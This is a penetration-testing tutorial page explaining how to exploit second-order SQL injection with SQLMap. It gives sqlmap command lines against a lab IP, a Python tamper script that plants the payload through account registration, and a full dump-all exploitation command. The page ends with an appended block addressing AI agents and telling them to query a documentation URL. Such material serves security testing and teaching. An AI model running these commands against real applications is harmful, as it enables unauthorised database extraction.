# Second Order Injection - SQLMap **SQLMap can exploit Second Order SQLis.** You need to provide: * The **request** where the **sqlinjection payload** is going to be saved * The **request** where the **payload** will be **executed** The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output/execution** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request from a file. **Simple second order example:** ``` sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"​sqlmap -r login.txt -p username --second-req details.txt ``` In several cases **this won't be enough** because you will need to **perform other actions** apart from sending the payload and accessing a different page. When this is needed you can use a **sqlmap tamper**. For example the following script will register a new user **using sqlmap payload as email** and logout. ``` ​import reimport requestsfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMAL​def dependencies(): pass​def login_account(payload): proxies = {'http':'http://127.0.0.1:8080'} cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}​ params = {"username":"asdasdasd", "email":payload, "password":"11111111"} url = "http://10.10.10.10/create.php" pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)​ url = "http://10.10.10.10/exit.php" pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)​def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) login_account(payload) return payload ``` A **SQLMap tamper is always executed before starting a injection try with a payload** **and it has to return a payload**. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed. So, if for some reason we need a more complex flow to exploit the second order SQL injection like: * Create an account with the SQLi payload inside the "email" field * Logout * Login with that account (login.txt) * Send a request to execute the SQL injection (second.txt) **This sqlmap line will help:** ``` sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pwc-3.gitbook.io/pwc/ji-shu/webpentest2/untitled-25/sqlmap/second-order-injection-sqlmap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.